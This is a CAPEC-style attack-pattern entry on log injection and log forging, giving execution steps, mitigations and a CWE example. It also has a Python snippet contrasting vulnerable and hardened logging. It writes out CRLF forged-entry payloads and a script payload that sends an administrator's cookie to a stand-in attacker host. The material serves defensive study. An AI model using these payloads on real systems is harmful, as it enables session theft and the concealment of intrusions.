This attack targets the log files of the target host. The attacker
injects, manipulates or forges malicious log entries in the log file,
allowing him to mislead a log audit, cover the traces of an attack, or
perform other malicious actions. The target host does not properly control
log access. As a result, tainted data ends up in the log files, leading to a
failure of accountability, non-repudiation and incident forensics
capability.
Attack Execution Flow
Explore
Determine Application's Log File Format:
The first step is exploratory, meaning the attacker observes the system.
The attacker looks for actions and data that are likely to be logged. The
attacker may already be familiar with the log format of the system.
Attack Step Techniques
ID | Attack Step Technique Description | Environments
1 | Determine logging utility being used by application (e.g. log4j) | env-All
2 | Gain access to application's source code to determine log file formats. | env-All
3 | Install or obtain access to instance of application and observe its log file format. | env-All
Outcomes
ID | Type | Outcome Description
1 | Success | Attacker determines log file format used by application.
2 | Inconclusive | Attacker cannot conclusively determine log file format; he/she can only guess what the format is.
Exploit
Manipulate Log Files:
The attacker alters the log contents either directly through manipulation
or forging, or indirectly through injection of specially crafted input that
the target software will write to the logs. This type of attack typically
follows another attack and is used to try to cover the traces of the
previous attack.
Attack Step Techniques
ID | Attack Step Technique Description | Environments
1 | Use carriage return and/or line feed characters to start a new line in the log file, and then add a fake entry. For example: "%0D%0A[Thu%20Nov%2012%2011:22]:Info:%20User%20admin%20logged%20in" may add the following forged entry into a log file: "[Thu Nov 12 12:11:22]:Info: User admin logged in". Different applications may require different encodings of the carriage return and line feed characters. | env-All
2 | Insert a script into the log file such that if it is viewed using a web browser, the attacker will get a copy of the operator/administrator's cookie and will be able to gain access as that user. For example, a log file entry could contain <script>new Image().src="http://xss.attacker.com/log_cookie?cookie="+encodeURI(document.cookie);</script>. The script itself will be invisible to anybody viewing the logs in a web browser (unless they view the source for the page). | env-All
Outcomes
ID | Type | Outcome Description
1 | Success | Forged entry or other malicious data inserted into application's logs.
2 | Failure | No entry inserted into logs, or the entry is visibly distinguishable from real entries.
Security Controls
ID | Type | Security Control Description
1 | Preventative | Input validation to ensure that only legal characters supplied by users can be entered into log files.
2 | Preventative | Encode information from the user such that any unexpected characters are encoded safely before they are entered into log files.
3 | Preventative | Post-processing of log files to remove or encode dangerous characters before displaying to a user may help in some cases. It will not help remove fake log entries entered using carriage return and line feed characters, however.
Attack Prerequisites
The target host is logging the actions and data of the user.
The target host insufficiently protects access to the logs or logging
mechanisms.
Typical Likelihood of Exploit
Likelihood: High
Methods of Attack
Analysis
Modification of Resources
Injection
Examples-Instances
Description
Dave Nielsen and Patrick Breitenbach PayPal Web Services (aka PHP
Toolkit) 0.50, and possibly earlier versions, allows remote attackers to
enter false payment entries into the log file via HTTP POST requests to
ipn_success.php.
Related Vulnerabilities
CVE-2006-0201
Description
If a user submits the string "twenty-one" for val, the following entry
is logged:
INFO: Failed to parse val=twenty-one
However, if an attacker submits the string
"twenty-one%0a%0aINFO:+User+logged+out%3dbadguy", the following entry is
logged:
INFO: Failed to parse val=twenty-one
INFO: User logged out=badguy
Clearly, attackers can use this same mechanism to insert arbitrary log
entries. (Source: CWE Log forging)
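The CWE example above, together with Security Controls 2 (encode before writing) and 3 (post-process before display), as an added Python example that is not part of the CAPEC entry; the function names and the constructed inputs are assumptions, and the second input only reuses the script-in-log shape from the Exploit step.

```python
import html
import re
import urllib.parse

# Constructed inputs: the first is the URL-encoded string from the CWE
# log-forging example above; the second has the shape of the script-in-log
# technique from the Exploit step.
FORGED_INPUT = "twenty-one%0a%0aINFO:+User+logged+out%3dbadguy"
SCRIPT_INPUT = ('<script>new Image().src="http://xss.attacker.com/log_cookie'
                '?cookie="+encodeURI(document.cookie);</script>')

# Everything outside printable ASCII (CR, LF, tab, NUL, ESC, non-ASCII) plus
# the backslash itself, so the escaped form below is unambiguous.
_UNSAFE = re.compile(r"[^\x20-\x5b\x5d-\x7e]")

def unsafe_log_line(val: str) -> str:
    """Vulnerable form: decoded user input is written to the record verbatim."""
    return "INFO: Failed to parse val=" + urllib.parse.unquote_plus(val)

def sanitize_for_log(val: str) -> str:
    """Preventative control 2: encode each unsafe character as \\xNN (or \\uNNNN)
    so one write can never produce a second record or a terminal escape."""
    def enc(m):
        c = ord(m.group())
        return "\\x%02x" % c if c < 0x100 else "\\u%04x" % c
    return _UNSAFE.sub(enc, val)

def safe_log_line(val: str) -> str:
    """Hardened form of unsafe_log_line: same record, control characters encoded."""
    return "INFO: Failed to parse val=" + sanitize_for_log(
        urllib.parse.unquote_plus(val))

def record_count(entry: str) -> int:
    """Number of records a line-oriented log reader sees for one write."""
    return len(entry.splitlines())

def render_for_browser(entry: str) -> str:
    """Preventative control 3: HTML-escape a record before a web log viewer
    displays it, so embedded markup is shown as text instead of executed."""
    return html.escape(entry, quote=True)

if __name__ == "__main__":
    print(repr(unsafe_log_line(FORGED_INPUT)))  # extra forged record from one write
    print(repr(safe_log_line(FORGED_INPUT)))    # one record, CR/LF left visible
    print(render_for_browser(SCRIPT_INPUT))
```

As control 3 notes, escaping at display time neutralises the script payload but cannot undo a forged record that CR/LF already split off at write time, which is why sanitize_for_log runs before the write.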
Attacker Skills or Knowledge Required
Skill or Knowledge Level: Low
This attack can be as simple as adding extra characters to the logged
data (e.g. the username). Adding entries is typically easier than removing
entries.
Skill or Knowledge Level: Medium
A more sophisticated attack can try to defeat the input validation
mechanism.
Probing Techniques
Description
The attacker will try to determine which data may be logged in case of
a success or failure of a predetermined action such as authentication.
Once that data has been identified, the attacker may try to craft
malicious data to inject.
Description
A vulnerability testing tool can be used to test the input validation
mechanism.
Solutions and Mitigations
Carefully control access to physical log files.
Do not allow tainted data to be written in the log file without prior
input validation. Whitelisting may be used to properly validate the
data.
Use synchronization to control the flow of execution.
Use static analysis tools to identify log forging vulnerabilities.
Avoid viewing logs with tools that may interpret control characters in the
file, such as command-line shells.
Attack Motivation-Consequences
Scope | Technical Impact | Note
Integrity | Modify application data |
Injection Vector
The variable being logged
Payload
The malicious characters or the crafted data which should forge the log
entry.
Activation Zone
The logging mechanism (This can be as simple as writing to a file, logging
API, etc.)